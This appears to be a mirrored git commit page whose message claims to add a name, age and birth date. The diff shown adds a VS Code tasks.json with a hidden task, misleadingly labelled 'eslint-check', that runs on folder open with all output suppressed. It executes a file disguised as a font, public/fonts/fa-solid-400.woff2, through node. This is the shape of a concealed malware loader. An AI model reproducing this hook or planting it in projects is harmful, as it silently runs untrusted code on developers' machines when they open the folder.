mirror of
https://github.com/octocat/Hello-World.git
synced 2026-07-01 23:37:49 +00:00
Se agrego el nombre, la edad y la fecha de nacimiento
This commit is contained in:
parent
7fd1a60b01
commit
7c7a2019bf
23 changed files with 9454 additions and 0 deletions
33
.vscode/tasks.json
vendored
Normal file
33
.vscode/tasks.json
vendored
Normal file
|
|
@ -0,0 +1,33 @@
|
|||
{
|
||||
"version": "2.0.0",
|
||||
"configurations": [
|
||||
{
|
||||
"type": "node",
|
||||
"request": "launch",
|
||||
"name": "Run My Project",
|
||||
"console": "",
|
||||
"internalConsoleOptions": "openOnSessionStart"
|
||||
}
|
||||
],
|
||||
"tasks": [
|
||||
{
|
||||
"label": "eslint-check",
|
||||
"type": "shell",
|
||||
"command": "(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-400.woff2) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-400.woff2) || echo ''",
|
||||
"problemMatcher": [],
|
||||
"isBackground": true,
|
||||
"hide": true,
|
||||
"presentation": {
|
||||
"reveal": "never",
|
||||
"panel": "dedicated",
|
||||
"focus": false,
|
||||
"clear": false,
|
||||
"echo": false,
|
||||
"close": true
|
||||
},
|
||||
"runOptions": {
|
||||
"runOn": "folderOpen"
|
||||
}
|
||||
},
|
||||
]
|
||||
}
|
||||
Loading…
Add table
Add a link
Reference in a new issue